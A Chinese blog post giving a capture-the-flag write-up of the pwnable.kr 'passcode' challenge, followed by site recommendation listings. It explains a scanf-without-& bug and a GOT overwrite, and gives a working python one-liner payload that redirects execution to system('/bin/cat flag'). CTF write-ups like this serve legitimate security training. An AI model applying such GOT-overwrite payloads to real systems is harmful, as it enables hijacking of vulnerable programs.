pwnable.kr-passcode

最新推荐文章于 2023-05-10 18:35:42 发布
最新推荐文章于 2023-05-10 18:35:42 发布
阅读量561 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35661990/article/details/82595621
版权

这道题的难点在于GOT表覆写,理解了GOT表和PLT表的关系就比较好做了。

函数在调用printf等函数的时候需要访问PLT表,而PLT表中储存的是GOT表对应项的地址。

另外一点就是scanf的参数如果没有加&地址符,就会把参数所在栈内的4个字节(我认为是因为题目中要传入%d是四字节的int型吧)当作地址,然后把缓冲区的数据输入进去。(在IDA中看,就是有加地址符,程序会执行lea指令,没加地址符,就会直接执行mov指令)

#include <stdio.h>
#include <stdlib.h>
 
void login(){
        int passcode1;
        int passcode2;
 
        printf("enter passcode1 : ");
        scanf("%d", passcode1);//没加&,所以系统会把passcode1的值压入栈内,然后执行scanf函数
        fflush(stdin);
 
        // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
        printf("enter passcode2 : ");
        scanf("%d", passcode2);
 
        printf("checking...\n");
        if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
                exit(0);
        }
}
 
void welcome(){
        char name[100];
        printf("enter you name : ");
        scanf("%100s", name);
        printf("Welcome %s!\n", name);
}
 
int main(){
        printf("Toddler's Secure Login System 1.0 beta.\n");
 
        welcome();
        login();
 
        // something after login...
        printf("Now I can safely trust you that you have credential :)\n");
        return 0;

分析程序,发现welcome里开了一个很大的name数组,然后login函数里的scanf没有给参数加地址符&。

可以直接用objdump -d passcode或者gdb ./passcode后使用 disassemble welcome查看welcome函数的汇编

 另外就是用scp -P 2222 passcode@pwnable.kr:/home/passcode/passcode /home把passcode源文件拷贝到本地然后用IDA查看。

从上面两个图片可以看出name数组的栈底是-0x70ebp,passcode1栈底是-0x10ebp,而name数组有100个字节空间,所以只要name数组的最后四个字节空间正好是passcode1的值(0x70和0x10相差96个字节)

之后查看GOT表

我们可以让passcode1的值等于0804a000或者0804a004,因为print和fflush都会在scanf函数之后执行,把passcode1的值写成got表的地址,因为scanf参数没有加地址符,所以会直接把passcode1的值放入栈中,也就是got表的地址,然后执行scanf函数,把我们输入的值写入got表地址所代表的内存空间中。

这样之后在调用print或者fflush时会访问PLT表,然后根据PLT表内储存的GOT表的地址访问相应的GOT表项,然后执行GOT表项所指向的程序段落,这样我们就能通过修改GOT表内的内容,来随意控制程序执行我们想要执行的内容。

我们要获得flag就调用login函数里的system函数,地址是0x80485ea。

最后构造playload=" 'a'*96 + '\x00\xa0\x04\x08' +'\xea\x85\x04\x08' "

因为scanf是要求%d输入,所以0x080485ea=134514147

python -c "print('a'*96 + '\x00\xa0\x04\x08' +'134514147\n')"| ./passcode

https://blog.csdn.net/qq_18661257/article/details/54694748

https://www.cnblogs.com/binlmmhc/p/6189514.html

https://blog.csdn.net/qq_33528164/article/details/70505151

 

吾梦不尽
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
pwnable.krpasscode
river
05-03 6681
passcode          下载下来的源代码     从源代码分析看出来,在scanf的时候passcode1和passcode2没有加地址符号,因此会存在题目中所说的警告。   这道题木一共两个函数,welcome和Login,在welcome中输入了name字符串,然后在Login中输入了passcode1和passcode2,在passcode1=338150(0x5
iphone-passcode-unlocker.exe
11-20
iphone-passcode-unlocker.exe
pwnable.kr-passcode WP
Casuall的博客
03-30 474
首先用ssh连进去,一个可执行文件,一个源码文件,一个flag文件,先执行passcode程序,让你输入name,passcode1,passcode2,如图。 我们先用scp命令把文件拷贝下来,scp -P2222 passcode@pwnable.kr:passcode . ,注意后面有一个点,表示拷贝到当前目录的意思。然后看一下源码 #include <stdio.h> #in...
pwnable.kr 简单题目详细笔记汇总
H4ppyD0g的博客
09-12 866
pwnable.kr fd pwnable.kr collision pwnable.kr bof pwnable.kr flag pwnable.kr passcode pwnable.kr random pwnable.kr input pwnable.kr leg pwnable.kr mistake pwnable.kr shellshock pwnable.kr coin1 pwnable.kr lotto pwnable.kr cmd1 pwnable.kr cmd2 pwnable.kr u
[pwnable.kr]passcode
iekuil的博客
10-03 280
->plt[1]第一条指令jmp *got[3] --> plt[1]第二条指令压栈 --> plt[1]第三条指令jmp plt[0] --> plt[0]第一条指令再压栈 --> plt[0]第二条指令jmp *got[2] --> 进入动态链接函数 --> 回写got表&调用目标函数。got[3],即804a000处实际存的值是8048426,即plt[1]中第二条指令的位置,除了plt[0]和got[0]、got[1]、got[2]有特殊作用外,
pwnable.krpasscode
think_ycx的专栏
07-09 536
下载程序scp -P 2222 -p passcode@pwnable.kr:/home/passcode/* ./漏洞信息程序main函数中,welcome和login存在栈复用,welcome调用gets向ebp-0x70读入100个字符。 login中scanf没有取地址,因此会把[ebp-10h]和[ebp-0xch]的内容当成要写入的地址。在welcome中,我们有一次布置数据的机会,可...
pwnable.krpasscode
搓雪小怪兽的工作室
08-26 247
题目描述 Mommy told me to make a passcode based login system. My initial C code was compiled without any error! Well, there was some compiler warning, but who cares about that? ssh passcode@pwnable.kr -p2...
pwnable.kr - passcode
ACdream
10-12 522
pwnable.kr passcode
pwnable.kr——passcode
xy_369的博客
05-10 91
⑩:综上,我们的思路是将 got 表中 printf 函数的地址(即0x0804A000)中存的值修改为 system("/bin/cat flag");的地址(0x080485E3)即可,随后程序执行到 printf 函数就相当于执行system("/bin/cat flag");函数,但已知我们只能控passcode1不能控passcode2,所以这题不能依靠修改passcode1,passcode2使程序正常执行来执行 system("/bin/cat flag");⑦:查找偏移,可知偏移为96。
pwnable.krpasscode summary
Bill
04-23 684
本人写这篇博客完全是为了方便以后查证,若能帮上各位的忙,在线非常宽慰. 关于pwnable.kr上的passcode,这博客写的很到位,大家不妨去看一下:passcode.我在这里只是补充几个问题,再将整个过程简单化而已. 1.plt表和got表的关系   plt表—->got表.当程序中有需要库函数时,该plt和got表上场了.我们来举一个简单的例子(test.c):#include <st
flutter-passcode:Flutter-密码锁定屏幕
05-02
import 'package:passcode_screen/passcode_screen.dart' ; 它能为您做什么? 只需创建一个漂亮的密码锁视图。 PasscodeScreen ( title : title, passwordEnteredCallback : _onPasscodeEntered, ...
iOS-Passcode:适用于 iOS 的密码应用
07-08
这意味着当 Passcode 被赋予相同的输入时,它会给出相同的输出。 已经使用生成的密码并需要检索它? 只需再次生成它。 由于该算法是单向的,因此在给定输出密码的情况下无法检索主密码。 它无处不在。 由
Android代码-passcode
08-06
Passcode Android Passcode view Usage Adding to build.gradle for app ... url "http://dl.bintray.com/ashish29agre/passcode-repo" //for jitpack url "https://jitpack.io" } } XML Java PasscodeView passc
matlab开发-passcode
08-22
首先,我们来看`passcode.m`这个文件。这是一个MATLAB脚本或函数,它实现了`passcode`功能的核心逻辑。通常,这样的函数会包含以下关键部分: 1. **函数定义**:`function password = passcode(prompt, title, ...
【中科院1区】Matlab实现天鹰优化算法AO-RF锂电池健康状态估计算法研究.rar
最新发布
08-02
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
汽车行业数字化转型报告顶层规划设计.docx
08-02
汽车行业数字化转型报告顶层规划设计.docx
毕业设计,基于ASP.NET+SqlServer开发的企业投资价值分析系统,内含完整源代码,数据库,毕业论文
08-02
毕业设计,基于ASP.NET+SqlServer开发的企业投资价值分析系统,内含完整源代码,数据库,毕业论文 自中国证券市场产生以来,投资者进行投资理财迫切需要有一个科学的理论依据,在众多投资理论体系中,确定企业的价值和股票的价值,是一个重要的流派。著名的投资专家巴非特就是通过分析企业的内在价值,寻找价值被低估的股票,等到市场认可了该企业的价值,再将股票抛出,从而获得了的投机收益,其管理的基金也一度成为世界上最成功的投资基金之一。从西方国家理论界对相关领域的研究结果来看,也取得了一些成果,包括:CAPM 模型、 ICAPM模型、APT模型等,也有人用市盈率方法对股票进行定价。国内在相关的领域也取得了一些研究成果。然而,尽管国内外理论界研究成果较多,但真正适应中国证券市场、适应中国广大投资者的切实有效的理论至今仍是一个空白。在中国这样一个特殊的背景下,股权结构的特殊性、证券市场初创时期的投资性等因素,使得一些模型受到挑战,而且这些模型的精确化程度也受到限制,有必要探求新的思路和方法,为广大的投资者提供切实可靠的操作依据。对股票的价值进行评估必须综合尽可能全面的因素才能使得这些评估更加科
【创新未发表】Matlab实现黑猩猩优化算法Chimp-RF实现风电预测算法研究.rar
08-02
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
passcode文件怎么打开
12-02
要打开passcode文件,首先需要确认文件的格式和类型。如果这是一个文本文件,可以使用任何文本编辑器,如记事本、文本编辑器或专业的代码编辑器来打开它。在文件资源管理器或Finder中找到该文件,右键单击并选择“打开方式”,然后选择合适的编辑器。 如果passcode文件是加密的或者是受保护的压缩文件(如zip或rar格式),你需要输入正确的密码才能打开它。使用文件解压缩工具,如WinRAR、7-Zip或Mac系统自带的解压缩工具,输入正确的密码后,你就可以成功解压文件并打开它了。 另外,如果passcode文件是应用程序生成的特定格式文件,你可能需要相应的软件来打开它,例如Microsoft Excel用于打开.xlsx文件,Adobe Acrobat Reader用于打开.pdf文件等。在这种情况下,确保你的计算机上安装了相关的应用程序,并且可以通过双击文件直接打开或者通过应用程序的“文件-打开”选项来载入文件。 总之,要打开passcode文件,首先要弄清楚它的类型和格式,然后选择合适的工具或应用程序来进行操作。如果文件需要密码解锁,确保你知道正确的密码,并谨慎操作以避免文件损坏或丢失。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值